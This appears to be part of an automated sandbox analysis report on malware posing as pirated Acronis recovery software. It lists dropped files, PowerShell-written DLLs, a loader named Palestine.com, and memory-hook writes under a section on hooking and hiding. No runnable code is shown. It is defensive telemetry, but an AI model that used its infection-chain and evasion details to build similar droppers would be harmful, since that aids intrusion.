                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\DeviceUninstall.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\USBInfoLib.dll (copy)Jump to dropped file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\contactsUX.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-OGG5H.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Roaming\Panorado\is-2QEM3.tmpJump to dropped file
                Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\650429\Palestine.comJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-87NKD.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-IR9SP.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\LogHelper.exe (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\libssl-1_1-x64.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\DRAMSpeedLib.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\UserExperienceImprovementPlugin.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\5RLYIRN4B2NNKHJ11UTSZ2.exeFile created: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\VGAManufacturerLib.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-BHL7J.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\ti_managers_proxy_stub.dll (copy)Jump to dropped file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\CloudStorageService.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\DRAMManufacturerLib.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-8VJ6H.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-EVHCR.tmpJump to dropped file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msncore.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Roaming\Panorado\electronics.exe (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-9EE7H.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\msvcp140_1.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\Qt5Core.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\Microsoft.Azure.KeyVault.Core.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-N2CN3.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\msvcp140.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\Steam2.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\5RLYIRN4B2NNKHJ11UTSZ2.exeFile created: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-NEQ1G.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-9SPC4.tmpJump to dropped file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\bass.dllJump to dropped file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-I6BL7.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-KH84M.tmpJump to dropped file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\Microsoft.Developer.IdentityService.GitHubProvider.UI.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-U43LQ.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-AOFIL.tmpJump to dropped file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\mc_dec_aac.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-9IN29.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-EQNNJ.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\libusb-1.0.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\DIMMCapacityLib.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-D20BS.tmpJump to dropped file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\Microsoft.NET.Build.Extensions.Tasks.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-DUCDE.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-UADI4.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\cpuidsdk.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\libcrypto-1_1-x64.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-6GF75.tmp\V2DDYDPIWYUTCJYUB0IV5.tmpFile created: C:\Users\user\AppData\Local\Temp\is-I30SH.tmp\_isetup\_setup64.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\VGATypeLib.dll (copy)Jump to dropped file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\Microsoft.VisualStudio.Text.Logic.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\OPHWInfo.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\V2DDYDPIWYUTCJYUB0IV5.exeFile created: C:\Users\user\AppData\Local\Temp\is-BAC82.tmp\V2DDYDPIWYUTCJYUB0IV5.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-TCI75.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-9K44C.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\Newtonsoft.Json.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-RHD94.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\Qt5Svg.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-56B19.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\KillProcess.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\AIControlLib.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\ServiceUninstall.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-NMS81.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\CPUTypeCmdLib.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\AsSQLHelper.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\AsusBusinessIntelligenceCPPLib.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-JPD1F.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-O945R.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\aaHMLib_x64.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\Qt5ScriptTools.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\HalUninstall.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-8FE4M.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-BUBHC.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\DiskMediaTypeLib.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-HNNQ8.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-BAEH3.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-I791C.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-IECK1.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-DF4GF.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\System.Net.Http.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-MJJQ3.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-7QIOU.tmpJump to dropped file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\FSharp.Core.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\CPUManufacturerCmdLib.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\msvcp140d.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile created: C:\Users\user\AppData\Local\Temp\V2DDYDPIWYUTCJYUB0IV5.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-1MK9F.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-PSF4N.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-MOT2M.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\VideoMemoryLib.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-Q1AT3.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\_isetup\_setup64.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\qtgraphicaleffectsprivate.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-BAC82.tmp\V2DDYDPIWYUTCJYUB0IV5.tmpFile created: C:\Users\user\AppData\Local\Temp\is-RLSFG.tmp\_isetup\_setup64.tmpJump to dropped file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\clrjit.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-QCTRS.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\Qt5Script.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-G5QCH.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-DK0J4.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-MQD1U.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-E63PO.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\cpuidsdk64.dll (copy)Jump to dropped file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\CN.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\V2DDYDPIWYUTCJYUB0IV5.exeFile created: C:\Users\user\AppData\Local\Temp\is-6GF75.tmp\V2DDYDPIWYUTCJYUB0IV5.tmpJump to dropped file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\tipskins.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\Qt5Gui.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-KG79P.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\FanProfile.exe (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-ECL6Q.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-URGPI.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile created: C:\Users\user\AppData\Local\Temp\5RLYIRN4B2NNKHJ11UTSZ2.exeJump to dropped file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\7za.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\vcruntime140_1.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-PDJ8O.tmpJump to dropped file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msidcrl40.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-DDTGT.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\Qt5Widgets.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-45OJH.tmp\_isetup\_setup64.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-UDQ9J.tmpJump to dropped file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\Microsoft.Build.Tasks.CodeAnalysis.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\qsqlite.dll (copy)Jump to dropped file

                Hooking and other Techniques for Hiding and Protection

                barindex
                Source: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exeMemory written: PID: 3920 base: CB0005 value: E9 8B 2F A3 76
                Source: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exeMemory written: PID: 3920 base: 776E2F90 value: E9 7A D0 5C 89
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
